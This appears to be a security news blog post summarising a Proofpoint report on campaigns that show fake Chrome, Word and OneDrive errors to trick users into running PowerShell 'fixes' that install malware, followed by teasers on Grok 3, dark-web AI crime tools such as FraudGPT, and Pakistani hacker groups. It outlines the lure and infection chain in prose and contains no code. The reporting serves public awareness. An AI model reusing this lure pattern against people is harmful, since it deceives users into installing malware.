Skip to main content

 

A new malicious campaign tricks people by pretending to be Google Chrome, Word, or OneDrive errors. They use these fake alerts to convince users to run harmful PowerShell "fixes" that actually install malware.

This campaign involves several cyber threat groups, including ClearFake and others like ClickFix and TA571. ClearFake has previously used tricks where websites ask users to update their browser, but the update actually installs malware.

In the latest attacks, cybercriminals use JavaScript in email attachments or hacked websites. They show fake error messages that look like they're from Google Chrome, Word, or OneDrive. These messages tell users to click a button to copy a PowerShell "fix" onto their computer. They're then told to run this script in a special Windows tool called PowerShell.

Even though these attacks need users to do several things to work, the trickery is clever enough to make people think there's a real problem that needs fixing. This might make users act quickly without thinking about the dangers, according to a report from ProofPoint.

The malware that ProofPoint found includes DarkGate, Matanbuchus, NetSupport, Amadey Loader, XMRig, a tool that steals from clipboards, and Lumma Stealer.

ProofPoint experts saw three types of attacks, each starting differently. Only the first one isn't clearly linked to TA571. In this case, linked to ClearFake, users visit a website that's been tampered with. It loads a bad script from the blockchain using Binance's Smart Chain contracts.

This script checks things and then shows a false warning from Google Chrome. It says there's a problem showing a web page. The message asks the visitor to install a "root certificate." They do this by copying a PowerShell script to their Windows Clipboard and running it in a special version of PowerShell made for administrators.


Fake Google Chrome error
Source: Proofpoint

When the PowerShell script is executed, it will perform various steps to confirm the device is a valid target, and then it will download additional payloads, as outlined below.

·         Flushes the DNS cache.

·         Removes clipboard content.

·         Displays a decoy message.

Downloads another remote PowerShell script, which performs anti-VM checks before downloading an info-stealer.

The 'ClearFake' attack chain
Source: Proofpoint

The second way attackers operate is linked to the 'ClickFix' plan. They modify websites that have been hacked. This change puts a frame over a fake Google Chrome error message.

People are told to open "Windows PowerShell (Admin)" and paste in the code given. This leads to the same bad programs as mentioned before.

Next, an email attack uses HTML attachments that look like Microsoft Word files. It asks users to add the "Word Online" extension to view the document correctly.

The error message gives options like "How to fix" and "Auto-fix". Choosing "How to fix" copies a special code to the computer's clipboard. It tells the user to paste this into PowerShell.

"Auto-fix" uses a special protocol called search-ms to show a file from the internet. This file is on a remote computer controlled by the attacker. It could be named "fix.msi" or "fix.vbs".

Fake Microsoft Word error leads to malware
Source: Proofpoint

In these situations, the PowerShell commands download and run either an MSI file or a VBS script. This results in infections by Matanbuchus or DarkGate.

In all situations, the attackers rely on the fact that people may not realize the dangers of running PowerShell commands on their computers.

They also use the fact that Windows doesn't always catch and stop the harmful actions started by the pasted code.

These various attack methods demonstrate that TA571 is trying out different ways to be more effective and discover more ways to infect more computers.







Popular posts from this blog

Grok 3: The AI Chatbot Breaking Boundaries with Bold, Uncensored Responses

  In the ever-evolving world of artificial intelligence, Grok 3 is quickly making waves both for its cutting-edge capabilities and its shocking, unfiltered personality. Developed by Elon Musk’s xAI, Grok 3 is an AI chatbot that has taken the internet by storm, especially among regular X (formerly Twitter) users in India. Known for its snarky responses, irreverent tone, and ability to learn from the unpredictable and sometimes profane language of users, Grok 3 is far from your average chatbot. Launched in February 2025, Grok 3 is a powerhouse of computational prowess, utilizing 12.8 trillion tokens to deliver responses that range from wildly intelligent to oddly rebellious. It’s trained with data from a variety of sources everything from legal filings to X posts giving it a diverse range of knowledge and a unique ability to engage in conversation that feels real, yet sometimes, unsettlingly raw. But it’s not just Grok 3’s wealth of knowledge that’s making headlines. The chatbot ...

AI tools on the dark web

  As AI continues to develop, its role in cybercrime on the dark web will only increase. The ability of cybercriminals to experiment with AI-powered tools is a new frontier in the ongoing war between hackers and cybersecurity experts. The Dark Web is quickly becoming a testing ground for new AI-powered attacks. The bad actors can customize their methods and expand their scope of their crimes. 1. FraudGPT – When AI is the worst spammer FraudGPT is a tool that sends fake emails. Create a fraudulent website And it spreads malware like a 24/7 scam operation. It's so clever it can trick you into handing over sensitive information to hackers—just like your grandma's bank details! If installed correctly, it does not require too much energy to operate. 2. Angler AI – A fishing tool that personalizes your attacks. Angler AI is a secret tool. That changes perspective depending on how you respond. It's like a telemarketer who knows everything about you and can even pretend to be y...

Pakistani Hacker Groups Tried to Breach India and Failed

Seven Advanced Persistent Threat (APT) groups associated with Pakistan attempted to infiltrate Indian infrastructure, resulting in a staggering 99.99% failure rate despite launching over 1.5 million cyberattacks. Identified by Maharashtra Cyber, these groups employed various tactics including malware, DDoS attacks, GPS spoofing, and misinformation campaigns, with only 150 attacks achieving success and causing negligible disruption. 1.         APT36 (Transparent Tribe): Known for cyber espionage since 2013, it targets Indian defense and government sectors using CrimsonRAT malware via spear-phishing. 2.        Pakistan Cyber Force: Claimed breaches of Military Engineering Services and Manohar Parrikar Institute, and defaced Armoured Vehicle Nigam Limited’s website with Pakistan’s flag. 3.        Team Insane PK: Targeted Indian Army websites, like the Army College of Nursing, with provocative messaging. ...